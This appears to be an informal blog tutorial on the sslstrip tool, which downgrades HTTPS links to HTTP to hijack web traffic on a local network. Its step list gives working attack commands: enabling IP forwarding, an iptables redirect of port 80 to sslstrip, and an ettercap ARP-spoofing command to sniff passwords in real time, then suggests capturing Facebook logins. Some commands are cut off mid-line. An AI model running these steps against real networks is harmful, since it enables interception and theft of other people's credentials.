This tool doesnt perform a generic man in the middle for of attack on ssl like tools such as ettercap or cain and able does. These tools rely on the stupidiy of users to accept a fake certificate on their web browser which most of them still do. With SSLstrip, the wow factor of the whole concept is that 98% of the attack is transparent to the average user. According to the author, "sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects them, then map those links into either look-alike HTTP links or homograph-similar HTTPS links". In version 0.5, a neat feature was added where it It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
There is a decent explanation on how it works on the authors website that im gonna mostly mimic, with minor changes for better elaboration.
- Python >= 2.4 (apt-get install python)
- The python "twisted-web" module (apt-get install twisted-web)
- # tar zxvf sslstrip-0.5.tar.gz //extrack the contents from compressed archive
- # cd sslstrip-0.5
- (Optional)# sudo python ./setup.py install //It Installs to appropriate directories. Not a necessity, can already run out the box.
- Flip your machine into forwarding mode. (# echo "1" > /proc/sys/net/ipv4/ip_forward)
- Setup iptables to redirect HTTP traffic to sslstrip. (# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
- Run ettercap to perform an arpspoof attack and also sniff out passwords on the fly and display them in real time. (# ettercap -Tq -i eth0 -M ARP:remote /10.0.0.2/ /10.00.1/)
- Run sslstrip. (# sslstrip.py -l
That all to the magic. To test this, goto a website like facebook and logon with some credentials(correct or incorrect) and just after you do so, take a look at ettercap's interface. Did you notice anything confidential about yourself that facebook and no one else should be allowed to know. AHHH.
Here's a nice video by John Strand demonstrating this attack: